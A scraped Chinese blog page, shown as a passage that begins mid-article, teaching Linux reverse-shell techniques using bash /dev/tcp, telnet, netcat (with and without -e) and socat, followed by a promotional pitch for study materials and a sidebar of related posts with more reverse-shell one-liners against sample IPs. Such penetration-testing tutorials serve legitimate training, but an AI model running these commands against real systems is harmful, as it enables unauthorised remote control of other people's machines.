【安全知识】,看完不会的来打我

最新推荐文章于 2024-04-15 00:46:24 发布
最新推荐文章于 2024-04-15 00:46:24 发布
阅读量1.2k 收藏 12
点赞数 23
分类专栏: 2024年程序员学习 文章标签: 安全
本文链接:https://blog.csdn.net/imtokenmax/article/details/137427920
版权

& 将标准错误输出重定向到标准输出

/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口

0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

3、效果如下

二、telnet反弹

Telnet 是一种用于远程登录到计算机系统的网络协议和命令行工具。使用 Telnet,您可以在本地计算机上打开终端窗口,然后通过 Internet 或局域网连接到其他计算机。

Telnet 命令可用于连接到远程计算机并执行各种操作,例如运行命令、编辑文件或查看系统信息。您可以使用 Telnet 客户端应用程序来发起 Telnet 会话,并在会话期间发送命令和接收输出。简单来说就是ssh的前身

条件:目标机器上存在telnet服务

1、 攻击者主机上打开两个终端分别执行监听

nc -lnvp port1

nc -lnvp port2

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip

2、目标主机中执行

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

3、效果如下

在4444的监听终端输入指令,即可在5555的监听终端查看指令结果

三、nc反弹

1、支持-e参数

如果目标机器上的nc支持-e参数,如下就可以直接反弹

攻击机执行

nc -lnvp 端口

目标机器执行如下命令反弹shell

nc -e /bin/bash x.x.x.x port

效果如下

2、不支持-e参数

这里讲的就是另外一种情况,目标机器上有nc,但是nc的版本不支持e参数,这里就给大家介绍一个技巧——NC串连

kali攻击机上开启两个终端监听不同端口分别用于接收输入和输出

目标机器上使用nc串联反弹权限

nc 客户端的ip 第一个端口|/bin/bash |nc 客户端的ip  第二个端口

详细给大家讲一下服务端执行这条命令的意思

语句的前半部分****服务端nc将shell回弹到客户端ip的第一个端口,此时客户端开启对第一个端口的监听并成功建立连接(但这里并不是交互式shell,看不到命令执行的结果),语句后半部分意思就是将用户在第一个端口建立的shell上的命令执行结果作为第二个端口的输出内容,此时用户再用客户端nc监听并连接第二个端口,这样就可以实现攻击者在第一个端口输入命令,在第二个端口就能看到命令执行的结果

效果如下

 这样我们再4567端口的监听页面输入的命令的回显结果就会在1234端口的监听页面显示

这招巨好用,大家可以多看看或者下去自己试一下

四、socat反弹

socat是一个用于数据转发的命令行工具,它可以在两个端口之间建立虚拟通道,将数据从一个端口转发到另一个端口,同时支持很多网络协议。

1、攻击机开启监听

2、目标机器使用socat反弹shell

执行如下命令

socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:x.x.x.x:port

x.x.x.x是攻击机的ip

port是攻击机开启的监听端口

3、效果如下

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

b5a486d4c3ab8389e65ecb71ac0)

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

imtokenmax合约众筹
关注
  • 23
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell
songling515010475的专栏
05-11 1642
一、通过bash反弹shell 1、 在攻击机上通过nc命令监听2222端口 ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ... 2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口 [root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1 3、连..
小白都能看得懂的教程 看完这篇还不会生成随机验证码图片,你来打我!!!
12-21
这不仅有助于学习Python的基础知识,还能进一步提升对图像处理和随机数生成的理解。 这个过程虽然简单,但可以作为更复杂验证码系统的基础。更高级的验证码可能包括扭曲字符、使用不同的字体、添加颜色以及更多的...
安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6100
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
[Shell]Telnet反弹shell
baguangman5501的博客
09-16 494
原作者:包子love 文章出处:黑白之道 今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。 这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,...
利用telnet反弹shell的两种方法
天涯的浪子
09-16 4657
今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。 这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。 攻击机: 目标机: 下面给大家...
反弹shell常见方法总结
qq_45746681的博客
10-08 729
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
三分钟带你看完打印机入门知识.doc
10-04
打印机是计算机输出设备的一种,主要用于将计算机处理的结果打印在纸上。评价打印机性能的主要指标包括打印分辨率、...了解这些基础知识,用户可以更好地选择适合自己需求的打印机,并正确安全地进行日常操作和维护。
密码学之看完不过你找我V1.1.pdf
11-10
选择题(五道)考的知识点应该比较小,也比较难掌控,只有认真把书看一遍并且多看看试题才能做到胸有成竹。下面是我自己的一些知识点总结: 1.安全机制指用来检测、阻止攻击或者从攻击状态里恢复的过程(或包含这种...
电脑知识208篇-看完不成高手都难
06-22
总的来说,《电脑知识208篇-看完不成高手都难》涵盖了电脑使用和信息技术的广泛领域,无论你是电脑新手还是寻求提升的用户,都能从中受益匪浅。通过系统的阅读和实践,你将对电脑有更深入的理解,逐步成长为电脑操作...
电脑知识精华[看完后绝对成为电脑高手].rar
02-20
总的来说,"电脑知识精华[看完后绝对成为电脑高手].rar"这个压缩包可能涵盖了上述所有内容,通过深入学习和实践,任何人都有可能提升为电脑高手。但记住,成为真正的高手并非一蹴而就,持续学习和经验积累才是关键。
反弹Shell原理与实现
m0_62451321的博客
11-14 3164
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
内网渗透-反弹shell的N种姿势
最新发布
lza20001103的博客
04-15 1065
内网渗透-反弹shell的N种姿势
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7575
反弹shell姿势大全,看这一篇就够啦~
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
windows反弹_利用telnet反弹shell的两种方法
weixin_42302638的博客
01-27 515
今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。这里我准备了一个公网服务器和一个本地虚拟机,公网服务器为攻击机,虚拟机为目标机。攻击机:目标机:下面给大家演示...
反弹shell的实现方式和检测方法
12-25 4354
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。 现在针对一些网络上反弹shell实例作说明:   反弹shell 现在针对一些网络上反弹shell实例作说明: 实例1,Bash反弹: Bash反弹,远程主机监听端口: nc -lvp 7777 被入侵的机器反弹shell命令如下: bash -i >&am...
多种姿势反弹shell
Brucetg的博客
08-20 7108
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 简单解释下: bash ...
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
论内网渗透中,反弹shell的各种姿势
热门推荐
weixin_43526443的博客
12-13 7万+
反弹shell是进入内网的第一步,也是权限提升用到的至关重要的一步。 1、bash反弹 攻击机: nc -lvp 4444 客户机: bash -i>& /dev/tcp/10.1.2.2/4444 0>&1 命令介绍: nc -i使用监听模式 -v 显示命令执行过程 -p 指定端口号。 -e 执行给定的命令 bash -i使用交互模式, -c 执行跟的命令 重定向 0:标准输入,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值